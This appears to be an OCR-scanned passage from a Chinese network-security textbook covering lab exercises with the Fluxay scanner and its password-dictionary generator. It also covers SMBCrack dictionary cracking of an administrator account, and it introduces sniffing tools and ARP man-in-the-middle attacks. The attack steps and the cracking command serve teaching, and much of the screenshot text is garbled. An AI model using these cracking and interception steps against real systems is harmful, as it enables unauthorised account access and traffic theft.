图 5-13 设置 IIS 检测 选项 





@@ 单 击 “ 下 一 步 "按钮 ,设置 有 关 FINGER 的 检测 选项 ,如 图 5-14 所 示 。 
加 








图 5-14 设置 FINGER 检测 选项 


加 单 击 “下 一 步 ? 按 钮 ,用 户 可 以 设置 RPC 的 有 关 检 测 选项 ,如 图 5-15 所 示 。 
| 





国 检测 src DCog 首 出 











图 5-15 设置 RPC 检测 选项 
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四 单 击 “下 一 步 ?按钮 ,可 以 选择 有 关 MISC 的 检测 选项 ,如 图 5-16 所 示 。 





msc 四 








IEPTTE IE | 
图 5-16 设置 MISC 检测 选项 
四 单 击 “下 一 步 ? 按 钮 ,可 以 选择 需要 检测 的 系统 插件 漏洞 类 别 , 如 图 5-17 所 示 。 


es > 


[加 ETUET 











回 ceer roy 62 Beales it 器 
[| 页 
而 
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页 
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回 3m ce 05 页 
San6s FTP CI Verify Vsernme AI 
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图 5-17 选择 系统 插件 


@ 单 击 " 下 一 步 " 按 钮 ,可 以 设置 使 用 猜 解 用 户 名 和 密码 的 字典 ,以 及 扫描 报告 保存 
的 路 径 、 并 发 线程 数量 等 选项 ,如 图 5-18 所 示 。 





玺 解 用 户 名 字典 : 





\Progr en Files\Fluxay\brate dic 国 


保存 扫 撕 报 告 - 
Proerm Files\Flweay\Reports\192. 168. :3] 


并 雪上 i007 习 











mm | | 


图 5-18 设置 猜 解 字典 及 其 他 选项 
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图 单 击 * 完 成 "按钮 ,在 显示 的 对 话 框 中 选择 需要 使 用 的 扫描 主机 ,如 图 5-19 所 示 。 
单 击 “ 开 始 ” 按 钮 ,流光 扫描 器 开始 扫描 ,如 图 5-20 所 示 。 在 扫描 的 过 程 中 ,弹出 “探测 结 
果 ” 窗 口 , 显 示 扫 描 结 果 , 如 图 5-21 所 示 。 扫 描 结 束 后 ,将 显示 如 图 5-22 所 示 的 提示 框 。 
单 击 “ 是 ”按钮 , 即 可 查看 到 扫描 的 最 终结 果 , 如 图 5-23 所 示 。 

二 


文件 到 ) 锭 辑 下 ) 查看 YY) 探测 他 ) 选项 作 ) 工具 思 和 助 辐 关于 由) 
探 囊 记录 查找 ;| 









口 吨 Pop3 主 机 
口 罗 Iap 主机 
口 仿 Fr 主机 
口 @ HTrr 主 机 本 上 


E 氏 ”Ta 味 [ga [三 | 





四 
主机 [ROW no， FS 
用 户 名 : [ocaros 二 | 一 一 二 
区 省 区 软件 实验 室 1995-2002 小 栓 作 品 版 权 所 有 
| E23 本 








国 显示 扫 搞 细节 ( 当 Sensor 安 装 在 远程 服务 器 ,速度 会 支 慢 ) 
口 后 台 概 式 , 扫描 开始 后 无 需 客户 彤 千 预 











站 | 到 
xme | 于 [名 
5-19 选择 扫描 主机 5-20 ”扫描 中 


外 探测 千 果 (18) 


是 否 需 要 查看 扫描 报告 ? 





= 


图 5-21 扫描 结果 图 5-22 ”提示 查看 扫描 报告 








(2) 使 用 流光 扫描 器 制作 黑客 字典 。 用 流光 扫描 器 制作 的 黑客 字典 可 以 根据 用 户 需 
要 任意 设 定 包含 的 字母 .数字 .字符 等 内 容 。 

虽 在 流光 扫描 器 的 主 界面 中 选择 “工具 ”一 “字典 工具 ”一 “黑客 字典 TI 流光 版 ” 命 
令 , 如 图 5-24 所 示 。 

@ 在 打开 的 对 话 框 中 选择 “设置 "选项 卡 ,用 户 可 以 选择 生成 密码 中 包含 的 字母 或 数 
字 及 其 范围 ， pt -25 所 示 。 

@ 在 “选项 ”选项 卡 中 可 以 设置 生成 的 字符 串 是 否 有 “字母 采用 大 写 形式 “仅仅 首 字 
母 大 写 ” a 如 图 5-26 所 示 。 





















EE Tor 和 于 | 
文件 加、 蜗 各 加 查看 如 ”收藏 如 ”工具 中 寓 助 吕 | 让 

[Oa -O- 国 国人 OP We GD | 
WEE) c: \pr ocr on Files\Fluxay\Reports\192 168.5.1-192. 165.5.10. htal 司 回 名 本 














潍 口 扫描 


445(Windows 2000 SMB) 


445(Windows 2000 SMB) 


139(SMB) 





RPC 扫 描 


Microsoft Windows NT/2000/XP/2003 RPC DCOM 组 冲 区 溢出 漏洞 (MS03-26) Exploit 





plugins 
Remote Host OS is Windows Server 2003 3790 (Yia SMB) 


Remote Host Null Session could be Established， 





型 













SE EE 
图 5-23 ”扫描 结果 
0】 Buila 3310 (0 用 户 ) 
文件 也， 编辑 也 ) 查看 W) 探测 他 ) 选项 上 ) | 工具 CT) 帮助 WD) 关于 @) 
本 可 CR ee 
wa tesa 
口 MSSQLI 具 » Pe rr 
口 念 Fr 主机 RE ,| 国 汪 co 
口 S hrp 主机 到 Rows I  »h sn 
远程 网 8 唤 探 ,天 as# 吕 
x  " 呈 aheram 


方案 文件 编辑 0) 


[he A Lh 





4 到 
[三 一 王 和 3 | 划 司 poooyil 探 计 度 | EE) 
图 5-24 流光 扫描 器 的 主 界面 


@ 在 “文件 存放 位 置 ? 选 项 卡 中 指定 字典 文件 保存 的 位 置 , 可 以 选择 是 否 把 大 于 
120KB 的 字典 文件 进行 拆 分 ,如 图 5-27 所 示 。 
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EE [时 才 字 天 流光 所 | 
设置 | 选项 “| 文件 存放 位 置 | 高 名 选项 | 方案 | 设置 ” 选项 | 文件 存放 位 置 | 高 级 选项 | 方案 | 


















FE 万 关于 
FY FEYTaF 
字母 范围 ”从 | 引 至 性 习 
数字 苍 园 从 F 可 至 本 


厂 符号 (Dx20 0x2E 


厂 如 公使 用 辅音 字母 
厂 字 瑟 和 数字 不 重复 ( 慢 ) 








确定 应用 的 | 帮助 ”| 确定 “|[ 取消“ ] 及 更 助 
图 5-25 设置 字典 选项 图 5-26 选项 设置 


@ 在 “高 级 选项 ”选项 卡 中 ,可 以 将 字母 .数字 或 符号 的 位 置 进行 固定 ,如 图 5-28 
所 示 。 

四 [ELEZTIRS 过 

设置 ”| 选项 。 文件 存放 位 置 | 高 级 渤 项 | 方案 | 设置 | 选项 | 文件 存放 位 置 高 纯 选 项 | 方案 | 


三 字母 位 置 
| PSTeTTTETTCTSTTTTCENETT Pa ev aEsrpor ern rs 
当前 磁盘 空间 剩余 :1724656 KBytes 
口 拆 分 文件 






















数字 位 置 
eds dd 








将 文件 折 委 为 下 分 符号 位 轩 
pr Ns pbs Ss A ST 是 : 











小 于 1208 的 字典 格 不 会 被 拆 分 








使 用 高 如 过 项 生成 字典 
口 贷方 案 生 志 了 [一 一 六 





Er 





确定 应 用 WW | 。 帮助 确定 1 多 | 向 
图 5-27 设置 文件 存放 位 置 图 5-28 设置 高 级 选项 





@ 单 击 “ 确 定 ” 按 钮 ,出 现 “ 字 典 属性 ”对 话 框 ,如 图 5-29 所 示 。 可 以 对 设置 字符 串 的 
格式 进行 确定 ,如 有 不 妥 , 单 击 * 再 等 一 会 !" 按 钮 ,返回 设置 对 话 框 进行 调整 。 





字 王 六， 油 
六 长 度 [ 入 
单词 长 度 : 「 5 位 。 首 字母 大 写 ， [ 漳 宇 于 不 天宇 
所 有 字母 大 写 大 写 。 数字 在 字母 前 : 厂 字 守 在 前 面 


充 公 使 用 铺 音 字母:「 有 畏 言 宇 生 预计 字典 大 小 三， 1201 术 
字 奥 文件 名: EDocuments snd 55 字母 数字 重复 : EI 
方案 文件 名 : = 当前 宣 利 儿 : 175505058 
折子 全 [ESEEE [ao |] 


图 5-29 “字典 属性 ”对 话 框 


SI mas ww ] Kio 


@ 单 击 * 开 始 " 按 钮 ,系统 开始 生成 字典 ,并 显示 生成 字典 的 进度 ,如 图 5-30 所 示 。 


字 奥 成 功 生成 | 


| 





图 5-30 ”生成 字典 进度 


542 任务 2: 使 用 SVBOak 进 行 密码 破解 


1. 任务 目标 

通过 密码 破解 工具 的 使 用 ,了 解 账户 的 安全 性 ,掌握 安全 密码 的 设置 原则 ,以 保护 账 
户 密码 的 安全 。 

2. 工作 任务 


使 用 SMBCrack 工具 软件 进行 密码 破解 。 
3. 工作 环境 


(1) 两 台 预 装 Windows 7 系统 的 主机 ,通过 网 络 相 连 。 
(2) 软件 工具 : SMBCrack。 


4. 实施 过 程 
SMBCrack 工具 软件 需要 在 DOS 命令 行 窗 口 运行 ,SMBCrack 的 命令 格式 如 下 。 
SMBCrack < IP> < Username> < Password file> [Port] 


其 中 ,IP 是 目标 主机 的 IP 地 址 ; Username 是 目标 主机 需要 破解 的 账号 ; Password 
file 是 字典 文件 ,如 图 5-31 所 示 。 















命令 提示 符 _ =I9lxl 
SMB Cracker V3-Protype for Fluxay 5,. by netXeves 2802 国 





lsMBCrack <IP> <Usernane> ¢Password file> [Port] 









Cc: \SMBCrack> 


图 5-31 SMBerack 工具 软件 


假设 SMBCrack 工具 软件 在 C 盘 hk 目录, 先 把 字典 文件 复制 到 hk 目录 中 ,然后 再 
按 下 列 步骤 操作 。 

(1) 选择 “开始 ”>“ 所 有 程序 ”>“ 附 件 ”>“ 命 令 提 示 符 ”命令 ,打开 命令 提示 符 窗口 。 
在 命令 提示 符 窗口 中 输入 cd\ 后 按 Enter 键 回 到 C 盘 根 目录 ,然后 输入 cd hk, 按 Enter 
键 。 输 入 smbcrack 192. 168. 5. 2 administrator 1. dic, 按 Enter 键 .如 图 5-32 所 示 。 
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图 5-32 smberack 命令 
(2) 开始 密码 破解 ,命令 提示 符 窗 口 显 示 破 解 的 进度 ,如 图 5-33 所 示 。 


5 命令 提示 符 - seberack 192. 168- 5- 2 adainistrator 1 dic 
SMB Cracker V3-Protype for Fluxay 5。hby netXeves 2982 





Processing Words 8994/1999882 1888 Words/Sec 





图 5-33 ”密码 破解 中 


(3) 目标 主机 192. 168. 5. 2 administrator 用 户 的 密码 是 123321, 密 码 破解 的 实验 结 
果 如 图 5-34 所 示 。 
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图 5-34 实验 结果 


5.5 常见 问题 解答 


1. 如 何 防止 账户 密码 被 破解 ? 

答 : 密码 设 定 最 好 不 要 使 用 名 字 的 拼音 或 生日 数字 的 组 合 ,最 好 使 用 无 意义 的 数字 
和 字母 组 合 ,并 且 位 数 尽量 多 ,经 常 更 换 , 防 止 黑客 破解 ; 对 不 同 网 站 和 程序 要 使 用 不 同 
的 密码 ,防止 黑客 破译 ; 网 上 购物 时 ,不 论 出 于 何 种 原因 都 不 允许 自己 的 信用 卡 资料 被 商 
家 存储 ; 只 向 有 安全 保证 的 网 站 发 送信 用 卡号 码 , 并 留意 浏览 器 底部 显示 的 挂 锁 图 标 或 
钥匙 型 图 标 。 

2. 什么 叫 弱 密码 扫描 ? 

答 : 弱 密码 是 指 仅 包含 简单 数字 和 字母 的 密码 ,例如 123、abc。 这 样 的 密码 很 容易 被 
破解 ,从 而 使 用 户 的 计算 机 面临 风险 ,因此 不 推荐 使 用 。 用 户 的 密码 最 好 由 字母 ,数字 和 
符号 混合 组 成 ,并 且 至 少 要 达到 8 位 长 度 。 弱 密码 可 能 存在 于 自己 的 计算 机 系统 中 ,也 可 
能 存在 于 用 户 在 网 络 上 的 注册 信息 中 ,如 计算 机 的 登录 密码 .QQ 密码 等 。 对 于 在 网 络 上 





























注册 的 重要 信息 ,如 网 上 银行 登录 密码 ,邮箱 的 登录 密码 等 设置 得 过 于 简单 时 ,就 可 能 被 
人 破解 ,从 而 造成 重大 损失 ,所 以 用 户 需要 特别 注意 。 


5.6 认证 试题 

一 、 选 择 题 
1. 网 络 攻击 的 发 展 趋势 是 ( ) 。 

A. 黑客 技术 与 网 络 病毒 日 益 融 合 B. 攻击 技术 日 益 先 进 

C. 病毒 攻击 D. 黑客 攻击 
2. 通过 非 直接 技术 攻击 称 为 ( ) 攻 击 手法 。 

A. 会 话 支持 B. 社会 工程 学 C. 特权 提升 D. 应 用 层 攻击 
3. 关于 “攻击 工具 日 益 先进 ,攻击 者 需要 的 技能 日 趋 下 降 " 的 观点 不 正确 的 

是 ( js 

A. 网 络 受 到 攻击 的 可 能 性 越 来 越 大 B. 网 络 受到 攻击 的 可 能 性 越 来 越 小 

C. 网 络 攻击 无 处 不 在 D. 网 络 风险 日 益 严 重 
4. 一 次 字典 攻击 能 否 成 功 , 很 大 因素 取决 于 ( 入 

A. 字典 文件 B. 计算 机 速度 C. 网 络 速度 D. 黑客 学 历 
5. 打 电 话 请 求 密码 属于 ( ) 攻 击 方式 。 

A. 木马 B. 社会 工程 学 C. 电话 系统 漏洞 ”D. 拒绝 服务 
二 、 判 断 题 
1. 冒充 邮件 回复 ,确认 安装 软件 同意 书 , 使 用 的 是 “字典 攻击 ”。 《 3 
2. 社会 工程 攻击 的 危害 性 不 容 小 帆 , 面 对 社会 工程 攻击 ,最 好 的 防范 是 接收 全 面 的 

安全 教育 。 ( ) 

三 、 简 答题 


1. 常用 的 密码 破解 工具 有 哪些 ? 
2. 什么 叫 弱 密码 ? 


四 、 操 作 题 


1. 利用 流光 软件 制作 黑客 字典 ,要求 密 码 由 3 位 字母 (a 到 g) 和 2 位 数字 (0 到 9) 组 
成 , 首 字 母 为 大 写 ,数字 在 字母 之 后 。 

2. 利用 流光 软件 制作 黑客 字典 ,要 求 密码 由 3 位 字母 (a 到 z) 和 2 位 数字 (0 到 9) 组 
成 , 首 字 母 为 大 写 ,数字 在 第 3、4 位 ,字母 在 第 1.2.5 位 。 

3. 利用 流光 软件 制作 黑客 字典 ,要 求 密码 由 6 位 字母 (a 到 g) 和 2 位 数字 (0 到 9) 组 
成 , 首 字 母 为 大 写 ,数字 在 第 2.4 位 ,字母 在 第 1.3.5.6.7.8 位 。 


6.1 用 户 需求 与 分 析 


网 络 监听 工具 是 一 把 双 刃 剑 , 在 网 络 管理 员 手 中 ,网 络 监听 工具 能 帮助 用 户 监 控 网 络 
流量 ,更 好 地 管理 网 络 ,在 黑客 手中 ,网 络 监听 工具 能 够 捕获 计算 机 用 户 因为 朴 忽 带 来 的 
漏洞 ,成 为 一 个 危险 的 网 络 间谍 。 掌 握 网 络 监听 工具 的 使 用 方法 对 于 学 习 黑 客人 侵 会 起 
到 事半功倍 的 效果 。 


6.2 预备 知识 


G21 网 络 监听 的 原理 


网 络 嗅 探 器 或 网 络 监听 技术 在 协助 网 络 管理 员 监 测 网 络 传输 数据 、 排 除 网 络 故障 等 
方面 具有 不 可 替代 的 作用 ,因此 一 直 备 受 网 络 管理 员 的 青睐 并 逐渐 发 展 完善 。 所 谓 监听 
技术 ,就 是 在 互相 通信 的 两 台 计 算 机 之 间 通 过 技术 手段 插入 一 台 可 以 接收 并 记录 通信 内 
容 的 设备 ,并 最 终 实现 对 通信 双方 的 数据 记录 。 一 般 都 要 求 用 作 监 听 途 径 的 设备 不 能 造 
成 通信 双方 的 行动 异常 或 者 链接 中 断 等 , 即 是 说 ,监听 方 不 能 参与 通信 中 任何 一 方 的 通信 
行为 ,仅仅 是 被 动 地 接收 记录 通信 数据 而 不 能 对 其 进行 自 改 。 

监听 的 弱点 是 它 要 求 监听 设备 的 物理 传输 介质 与 被 监听 设备 的 物理 传输 介质 存在 直 
接 联系 或 者 数据 包 能 经 过 路 由 选择 到 达 对 方 , 即 一 个 逻辑 上 的 三 方 连接 。 能 实现 这 个 条 
件 的 只 有 两 种 情况 : 监听 方 与 通信 方位 于 同一 物理 网 络 ,如 局 域 网 ,或 者 是 监听 方 与 通信 
方 存在 路 由 或 接口 关系 ,例如 通信 双方 的 同一 网 关 、 连 接 通信 双方 的 路 由 设备 等 。 因 此 嗅 
探 技术 不 太 可 能 在 公共 网 络 设备 上 使 用 ,所 以 当今 最 普遍 的 嗅 探 行为 并 不 是 发 生 在 互联 
网 上 ,而 是 发 生 在 各 个 或 大 或 小 的 局 域 网 中 ,因为 它 满足 监听 技术 的 必要 条 件 : 监听 方 与 
通信 方位 于 同一 物理 网 络 。 


G22 常见 网 络 监听 工具 介绍 


网 络 监听 工具 又 称 为 网 络 嗅 探 器 ,是 一 种 监视 和 收集 网 络 中 各 种 数据 信息 的 软件 ,利用 它 
通过 网 卡 可 以 随意 对 网 络 中 的 信息 进行 查看 ,监视 以 及 截获 ,是 黑客 最 得 力 的 信息 收集 工具 。 











网 络 监听 工具 分 为 软件 和 硬件 两 种 ,软件 的 有 Sniffer Pro、Wireshark、Network 
Monitor 等 ,优点 是 易于 安装 部 署 ,易于 学 习 使 用 和 交流 ,缺点 是 无 法 抓 取 网 络 上 所 有 的 
传说 ,在 某 些 情况 下 无 法 真正 了 解 网 络 的 故障 和 和 运行 情况 。 硬 件 的 网 络 监听 工具 通常 称 
为 协议 分 析 仪 ,一 般 是 商业 性 的 ,价格 比较 昂贵 ,但 会 支持 各 种 扩展 的 链 路 捕获 能 力 以 及 
高 性 能 的 数据 实时 捕获 分 析 功 能 。 

下 面 介绍 两 种 最 常见 的 网 络 监听 工具 软件 。 


1. 科 来 网 络 分 析 系 统 


科 来 网 络 分 析 系统 是 一 个 集 数 据 包 采 集 .解码 ,协议 分 析 统计 日 志 图 表 等 多 种 功能 
为 一 体 的 综合 网 络 分 析 系 统 。 它 可 以 帮助 网 络 管理 员 进 行 网 络 监测 、 定 位 网 络 故障 ,排查 
网 络 内 部 的 安全 隐患 。 科 来 网 络 分 析 系 统 能 够 全 实时 地 采集 一 分 析 一 统计 处 理 , 能 够 即 
时 地 反映 网 络 通信 状况 ,不 需要 进行 任何 后 期 处 理 。 科 来 网 络 分 析 系 统 强 大 的 数据 包 解 
码 功能 可 以 让 最 为 狭 猎 的 网 络 攻击 欺骗 行为 也 无 所 通 形 ; 针对 常用 网 络 协 议 设计 的 高 
级 分 析 模 块 为 用 户 提供 更 为 实用 的 网 络 使 用 数据 记录 ; 网 络 通信 协议 和 网 络 端点 都 可 以 
提供 详尽 的 数据 统计 ; 独创 的 协议 、 端 点 浏览 视图 结构 可 以 帮助 用 户 快速 定位 所 要 数据 ; 
丰富 的 图 表 功 能 为 用 户 提供 直观 的 信息 。 不 管 是 本 地 局 域 网 的 诊断 还 是 大 型 网 络 的 监 
测 , 科 来 网 络 分 析 系 统 都 是 一 款 不 可 或 缺 的 网 络 管理 工具 。 它 可 以 帮助 企业 网 络 完成 网 
络 流量 分 析 、 网 络 错误 和 故障 诊断 、 网 络 安全 分 析 、 网 络 性 能 检测 、 网 络 协 议 分 析 和 网 络 通 
信 监 视 。 网 络 分 析 攻 击 的 配备 可 以 从 本 质 上 监测 到 网 络 中 的 问题 ,协调 和 支持 各 种 网 络 
管理 工具 的 使 用 ,并 最 大 化 地 完善 网 络 管理 。 


2. Wireshark 工具 


Wireshark 是 目前 世界 上 最 受 欢迎 的 协议 分 析 软 件 , 应 用 于 网 络 的 日 常安 全 监测 、 网 络 
性 能 参数 测试 .网 络 恶 意 代 码 的 捕获 分 析 、 网 络 用 户 行为 监测 、 黑 客 活动 追踪 等 。Wireshark 
的 功能 是 将 捕获 到 各 种 协议 的 网 络 二 进 制 数据 流 ,呈现 为 人 们 容易 读 懂 和 理解 的 文字 和 图 
表 等 形式 , 极 大 地 方便 了 对 网 络 活动 的 监测 分 析 。 它 具有 十 分 强大 和 丰富 的 统计 分 析 功 能 ， 
可 以 在 Windows、Linux 和 UNIX 等 系统 上 运行 。Wireshark 软件 于 1998 年 由 美国 Gerald 
Combs 首创 研发 ,原名 为 Ethereal, 至 今世 界 各 国 已 有 100 多 位 网 络 专家 和 软件 人 员 共 同 参 
与 此 软件 的 升级 完善 和 维护 , 它 的 名 称 于 2006 年 5 月 由 Ethereal 改 为 Wireshark。 在 过 去 ， 
网 络 数据 包 分 析 软 件 昂贵 ,Wireshark 的 出 现 改 变 了 这 一 切 。 在 GNUGPL 通用 许可 证 的 保 
障 下 ,使 用 者 可 以 免费 取得 软件 及 其 源 代码 ,并 拥有 对 源 代码 修改 的 权利 。 


623 中 间 人 攻击 简介 


中 间 人 攻击 (Man in the Middle Attack.MITM) 是 一 种 间接 的 入 侵 攻 击 。 它 利用 各 
种 技术 手段 将 入侵 者 控制 的 一 台 计 算 机 放置 在 网 络 连接 中 的 两 台 通信 计算 机 之 间 , 这 人 台 
计算 机 就 称 为 "中间人 ”。 如 果 你 的 主机 被 攻击 ,说明 在 传输 数据 的 过 程 中 存在 漏洞 ,当主 
机 之 间 进 行 通信 时 .通过 封装 数据 报 然后 转发 到 目标 主机 上 ,转发 的 数据 包 中 包括 源 IP 
地 址 .目标 IP 地 址 及 MAC 地 址 。 但 如 果 主 机 在 自己 的 缓存 表 中 找 不 到 目标 主机 的 地 址 
时 , 它 会 发 送 ARP 广播 ,在 此 过 程 中 就 有 可 能 被 其 他 攻击 者 冒充 目标 主机 。 一 般 情况 
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下 ,ARP 欺骗 并 不 使 网 络 无 法 正常 通信 ,而 是 通过 冒充 网 关 或 其 他 主机 使 得 到 达 网 关 或 
主机 的 数据 流通 过 攻击 主机 进行 转发 ,通过 转发 流量 可 以 对 流量 进行 控制 和 查看 ,从 而 控 
制 流量 或 得 到 机 密 信息 。 实 现 中 间 人 攻击 分 为 两 个 阶段 : 通过 某 种 手段 去 攻击 一 台 计 
算 机 ; 加 欺骗 主机 。 在 第 一 阶段 ,主机 B 通 过 ARP 注入 攻击 的 方法 实现 ARP 欺骗 ,通过 
ARP 欺骗 的 方法 控制 主机 A 与 其 他 主机 间 的 流量 及 机 密 信息 。 在 第 一 阶段 的 攻击 成 功 
后 ,主机 B 就 可 以 在 这 个 网 络 中 使 用 中 间 人 的 身份 ,转发 或 查看 主机 A 和 其 他 主机 间 的 
数据 流 。 当 主机 A 向 主机 C 发 送 请 求 时 ,该 数据 将 被 发 送 到 主机 B 上 ,主机 A 发 送 给 主 
机 C 的 数据 流 会 经 过 主机 B 转发 到 主机 C 上 ,主机 C 收 到 数据 以 为 是 主机 A 直接 发 送 
的 ,此 时 主机 C 将 响应 主机 A 的 请 求 ,同样 该 数据 流 将 会 被 主机 B 转发 到 主机 A 上 , 主 
机 A 收 到 响应 后 ,将 登录 主机 C, 这 样 主机 A 登录 时 的 用 户 名 及 密码 将 会 被 主机 B 查看 
到 。 中 间 人 攻击 的 工作 流程 如 图 6-1 所 示 。 


WY -nti 
伪造 ARP 应 答 报 文 
ns 2 


be 主机 B( 攻 击 者 ) 





> Enc 
图 6-1 中 间 人 攻击 的 工作 流程 
6.3 方案 设计 


方案 设计 如 表 6-1 所 示 。 
表 6-1 方案 设计 





任务 名 称 | 网 络 监听 工具 的 使 用 


1. 科 来 网 络 分 析 系统 的 使 用 

(1) 科 来 网 络 分 析 系统 的 安装 

(2) 科 来 网 络 分 析 系统 的 配置 

(3) 用 科 来 网 络 分 析 系 统 捕获 敏感 数据 包 

2. Wireshark 工具 的 使 用 

(1) Wireshark 的 安装 

(2) 用 Wireshark 捕获 数据 包 

(3) 设 定 Wireshark 过 滤 规 则 

(4) 从 捕获 数据 中 获得 敏感 信息 。 

3. 利用 Kali Linux 操作 系统 实施 Ettercap 中 间 人 攻击 
(1) 在 Windows Server 2012 上 搭建 FTP 服务 器 
(2) 使 用 Ettercap 工具 实现 中 间 人 攻击 





任务 分 解 

















能 力 目标 


世 D oo 


. 能 顺利 安装 科 来 网 络 分 析 系 统 软件 

. 能 对 科 来 网 络 分 析 系 统 进行 配置 

.能 使 用 科 来 网 络 分 析 系统 软件 捕获 敏感 数据 包 

. 能 使 用 科 来 网 络 分 析 系统 软件 捕获 远程 登录 的 用 户 名 和 密码 
.能 使 用 科 来 网 络 分 析 系统 统计 网 络 流量 


能 设置 Wireshark 的 过 滤 规 则 


.能 为 Wireshark 指定 过 滤器 

.能 使 用 Wireshark 捕获 数据 包 

.能 用 Wireshark 嗅 探 Telnet 登录 的 账号 和 密码 

.能 在 Kali Linux 操作 系统 上 利用 Ettercap 工具 实现 中 间 人 攻击 





知识 目标 


an mo 


. 了解 网 络 监听 的 原理 

. 熟悉 常用 的 网 络 监听 工具 的 优点 及 缺点 
. 了 解 科 来 网 络 分 析 系 统 的 作用 

. 了 解 Wireshark 工具 软件 的 作用 

. 了解 中 间 人 攻击 的 工作 原理 





素质 目标 





an mw 


.具有 良好 的 团队 协作 和 沟通 交流 能 力 
. 培养 良好 的 职业 道德 

. 掌握 网 络 安全 行业 的 基本 情况 

. 树立 较 强 的 安全 ,节约 、 环 保 意 识 
.培养 创新 能 力 


6.4 项 目 实 施 


641 任务 1: 科 来 网 络 分 析 系 统 的 使 用 
1. 任务 目标 


掌握 科 来 网 络 分 析 系 统 的 安装 方法 ,熟练 掌握 科 来 网 络 分 析 系 统 的 几 个 主要 功能 , 查 
看 网 络 流量 主机、 协议 ,流量 和 网 络 连接 的 方法 。 能 选择 监听 的 网 卡 、 查 看 捕获 的 报 文 ， 
并 能 对 捕获 的 数据 包 进行 专家 分 析 、 解 码 分 析 和 统计 分 析 。 能 对 基本 捕获 条 件 、 高 级 捕获 
条 件 和 任意 捕获 条 件 进行 设置 。 


2. 工作 任务 


(1) 科 来 网 络 分 析 系 统 的 安装 。 
(2) 科 来 网 络 分 析 系 统 的 配置 。 
(3) 用 科 来 网 络 分 析 系 统 捕获 敏感 数据 包 。 


3. 工作 环境 


(1) 两 台 预 装 Windows 7 系统 的 主机 ,通过 网 络 相 连 。 








(2) 软件 工具 : 科 来 网 络 分 析 系 统 软件 csnas_tech_8. 1.0. 8148_x64。 

4. 实施 过 程 

(1) 科 来 网 络 分 析 系 统 的 安装 。 

@ 双击 安装 程序 ,进入 csnas_tech_8. 1.0.8148_x64 的 安装 界面 ,如 图 6-2 所 示 。 


ETEREETEEEEROEZEEE =15X 
欢迎 使 用 科 来 网 络 分 析 系 统 8.1 技术 交 
和 









可 加 呈 持 在 您 99 电脑 上 安装 科 来 网 络 分 析 系统 8.1 技术 
交流 碑 Build 8148) 


建议 您 在 继续 之 前 关闭 其 他 所 有 应 用 程序 。 
点 击 “ 下 一 步 ” 维 续 , 或 “取消 ” 退出 安装 向 导 。 





下 - 步 om > 取消 
图 6-2 安装 界面 


@ 单 击 “下 一 步 ?按钮 ,出现 * 许 可 协议 ”对 话 框 , 选 择 * 我 接受 协议 ” 单 选 按钮 , 单 击 
“下 一 步 ” 按 钮 ,如 图 6-3 所 示 。 












个 安装 向 导 - 科 来 网 络 分 析 系 统 8. 1 技术 交流 版 


许可 协议 
请 阅读 以 下 重要 信息 ， 然 后 再 进入 下 一 步 * 
请 阅读 以 下 许可 协议 。 您 必须 接受 此 协议 的 条 薄 ， 然 后 才能 继续 安装 。 
习 来 网 络 分 析 系统 8. 1 技术 交流 版 最 终 用 户 使 用 许可 协议 
(e) 2003 - 2015 科 来 版 权 所 有 保留 所 有 权利 


| 本 协议 是 您 (个 人 或 单一 实体 ) 与 成 都 科 来 软件 有 限 公司 之 间 关 于 使 用 科 来 
| 网络 分 析 系统 的 法 律 协议 ， 请 认真 阅读 。 


| 本 协议 适用 于 科 来 网 络 分 析 系统 - 技术 交流 版 。 软件 包括 计算 机 软件 ， 并 
癌 能 包括 与 之 相关 的 媒体 和 任何 的 印刷 材 料 ， 以 及 联机 的 电子 文档 下 加 | 


6 我 接受 协议 A) 
个 我 下 接受 协议 中) 








< 上- 步 ®) 取消 


图 6-3 接受 “许可 协议 ” 


@ 单 击 “下 一 步 ” 按 钮 ,选择 并 设置 安装 的 路 径 , 默 认 安装 路 径 则 单 击 “ 下 一 步 ” 按 钮 
进行 安装 。 默 认 是 安装 在 C:\Program Files\Colasoft CSNAS 8. 1 Technology Edition 
目录 中 ,也 可 以 通过 单 击 旁边 的 “浏览 ”按钮 修改 路 径 , 不 过 为 了 更 好 地 使 用 还 是 使 用 默认 
路 径 进行 安装 。 

@ 默认 安装 全 部 组 件 ,要 求 至 少 165. 1MB 磁盘 空间 , 单 击 * 下 一 步 ? 按 钮 ,默认 创建 
桌面 图 标 和 快速 启动 图 标 , 也 可 以 取消 附加 任务 . 单 击 * 下 一 步 ? 按 钮 。 安 装 准备 完成 后 ， 
































项 目 6 网 络 监听 工具 的 使 用 ] < 











单 击 “ 安 装 ” 按 钮 ,开始 安装 。 


钮 ,立即 执行 应 用 程序 ,如 图 6-5 所 示 。 

















但 支 装 向 号 - 科 来 网 络 分 析 系 统 8.1 技术 交流 栈 aE 
信息 ~ 

许可 闫 以 下 重要 信息 再 进入 下 一 步 全 2 
准备 好 继续 安装 后 , 点 击 “下 一 步 ”。 

习 
1 网络 流 星 分 析 
|P) 网 络 杠 吴 和 坟 障 论断 
B) 网 络 安 全 分 析 | 
4) 网 络 性 能 检测 
5) 网 络 协 议 分 析 
6) 网 络 通 讯 监 视 
后 络 分 析 工具 g 醒 备 可 以 从 本 质 上 检 列 到 网络 中 的 问题 ， 协 调和 支持 各 种 
网络 管理 工具 的 使 用 ， 并 最 大 化 的 完善 奖 络 管 理 。 

一 

下 - 步 叫 > 
图 6-4 重要 信息 
ETEREETEETEEROEEEETI sy 





加 站 络 分 析 系 统 8. 1 技术 交流 版 安装 
ET 
和 
点 击 “结束 "退出 安装 

网 立即 执行 应 用 程序 








图 6-5 结束 安装 


@ 出 现 安装 提示 信息 如 图 6-4 所 示 , 单 击 * 下 一 步 ?按钮 ,安装 结束 后 , 单 击 “ 结 束 ” 按 





(2) 科 来 网 络 分 析 系 统 的 配置 。 科 来 网 络 分 析 系 统 是 非常 优秀 和 


时 
传输 在 网 络 上 的 每 一 个 信息 包 。 





图 6-6 所 示 。 


的 协议 分 析 软 件 , 同 


又 是 非常 优秀 的 嗅 探 器 , 它 利 用 以 太 网 特性 把 网 络 适配器 置 为 混杂 模式 状态 后 ,能 接收 


QO 安装 完成 后 , 单 击 “ 实 时 分 析 ” 选 项 卡 , 主 界面 出 现 “ 本 机 网 络 适配器 ”, 本 机 有 几 张 
网 卡 就 会 有 几 个 本 地 连接 选项 , 勾 选 IP 地 址 为 192. 168. 5. 1 的 “本 地 连接 ” 复 选 框 ,分 析 
方案 包括 全 面 分 析 、HTTP 应 用 分 析 、 邮 件 应 用 分 析 、DNS 应 用 分 析 、FTP 应 用 分 析 和 
